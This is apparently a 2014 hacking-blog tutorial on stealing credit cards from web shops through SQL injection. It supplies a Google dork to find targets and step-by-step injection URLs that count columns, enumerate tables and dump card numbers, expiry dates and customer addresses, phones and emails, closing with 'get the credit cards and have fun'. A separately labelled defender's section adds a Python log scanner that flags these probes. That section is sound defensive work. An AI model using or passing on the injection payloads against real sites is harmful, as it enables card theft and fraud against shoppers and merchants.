Tuesday 11 March 2014

Web shop Hacking (Credit Cards)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~


(This tutorial may be harmful to society and illegal too; use it only for educational purposes.)

[Level: Medium] [Prerequisites: SQL injection]

1) We have to search Google for web shops. I used this dork:

Code:
inurl:customer_testimonials.php testimonial_id=

2) Let's say we got this site:
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7

3) We have to check if it's vulnerable to SQLi, so we add this
Code:
'
to the url:
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7'
If we get an error, it means the website is vulnerable.

4) We have to check the column number; we try with 10 first:
Code:
+order+by+10--
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+order+by+10--
If we don't get an error, it means the website has more than 10 columns; if we get an error, it means the website has fewer than 10 columns.

5) This time we get an error, so now we try from 1 to 9:
Code:
+union+select+1,2,3,4,5,6,7,8,9--
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--
Now we've found it: the website has 9 columns.


6) Most of the time we can get info from columns 3 and 6; let's say now we can from 3 xD. Now we can get the database user, database name and database version this way:
*- database user
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Cuser%28%29%2C4%2C5%2C6%2C7%2C8%2C9--
*- database name
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Cdatabase%28%29%2C4%2C5%2C6%2C7%2C8%2C9--
*- database version
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Cversion%28%29%2C4%2C5%2C6%2C7%2C8%2C9--


7) We need the table names; we add this to the url:
Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Ctable_name%2C4%2C5%2C6%2C7%2C8%2C9+from+information_schema.tables--
8) Now we need the columns; we add this to the url:
Code:
+union+select+1,2,concat(table_name,char(58),column_name),4,5,6,7,8,9+from+information_schema.columns--
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Cconcat(table_name,char(58),column_name),4,5,6,7,8,9+from+information_schema.columns--


9) Now all we have to do is view the orders and customer info (that's where the credit cards are xD). If we add this to the url we will get credit card numbers, payment method, credit card type......
Code:
+union+select+1,2,concat(payment_method,char(58),cc_type,char(58),cc_number,char(58),cc_expires),4,5,6,7,8,9+from+orders--
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1%2C2%2Cconcat(payment_method,char(58),cc_type,char(58),cc_number,char(58),cc_expires),4,5,6,7,8,9+from+orders--
If we add this to the url we will get lots of info about the customers: address, phone number, e-mails, zip code, and all of the credit card info.
Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+
>>>
Code:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+
Now one step left.


10) Get the credit cards and have fun.
Stay tuned for more! Happy hacking!
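As an added defender's example (not part of the original post): a small Python scanner over constructed web-server access-log lines that URL-decodes each query parameter and flags the probes walked through above (the stray quote, ORDER BY column counting, UNION SELECT and information_schema reads), plus any non-integer value in testimonial_id, which the page treats as a numeric id. The log lines, client addresses and the assumption that testimonial_id is integer-only are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real traffic); the query strings mirror
# the probes the tutorial walks through, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Mar/2014:10:01:02 +0000] "GET /customer_testimonials.php?testimonial_id=7 HTTP/1.1" 200 5120
203.0.113.10 - - [11/Mar/2014:10:01:09 +0000] "GET /customer_testimonials.php?testimonial_id=7%27 HTTP/1.1" 500 812
203.0.113.10 - - [11/Mar/2014:10:01:15 +0000] "GET /customer_testimonials.php?testimonial_id=7+order+by+10-- HTTP/1.1" 500 812
203.0.113.10 - - [11/Mar/2014:10:01:31 +0000] "GET /customer_testimonials.php?testimonial_id=7+union+select+1%2C2%2Cversion%28%29%2C4%2C5%2C6%2C7%2C8%2C9-- HTTP/1.1" 200 5301
203.0.113.10 - - [11/Mar/2014:10:02:40 +0000] "GET /customer_testimonials.php?testimonial_id=7+union+select+1%2C2%2Ctable_name%2C4%2C5%2C6%2C7%2C8%2C9+from+information_schema.tables-- HTTP/1.1" 200 6400
198.51.100.7 - - [11/Mar/2014:10:03:01 +0000] "GET /customer_testimonials.php?testimonial_id=12 HTTP/1.1" 200 5098
"""

# Common log format: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probes used in the tutorial, matched against the *decoded*
# parameter value so that %2C / %28 / '+' encoding cannot hide them.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_read": re.compile(r"information_schema\.", re.I),
    "concat_char": re.compile(r"\b(concat|char)\s*\(", re.I),
    "comment_tail": re.compile(r"(--|#)\s*$"),
}

# Assumed for this example: the application only ever uses testimonial_id as an
# integer, so anything else in it (even a lone quote) is anomalous.
INTEGER_PARAMS = {"testimonial_id"}

def inspect_line(line):
    """Return {ip, status, findings} for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qsl already turns '+' into spaces and decodes %XX escapes.
    for key, value in parse_qsl(urlsplit(m.group("target")).query):
        if key in INTEGER_PARAMS and not value.strip().isdigit():
            findings.append("non_integer_" + key)
        findings.extend(name for name, pat in SQLI_PATTERNS.items() if pat.search(value))
    return {"ip": m.group("ip"), "status": m.group("status"), "findings": findings}

def scan(log_text):
    # Keep only the requests that carry at least one finding.
    results = (inspect_line(line) for line in log_text.splitlines())
    return [r for r in results if r and r["findings"]]
```

Running `scan(SAMPLE_LOG)` returns the four probe requests from 203.0.113.10 and nothing for the two plain integer lookups; the 500 responses on the quote and ORDER BY lines are the same error signal the tutorial relies on, seen from the server side.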
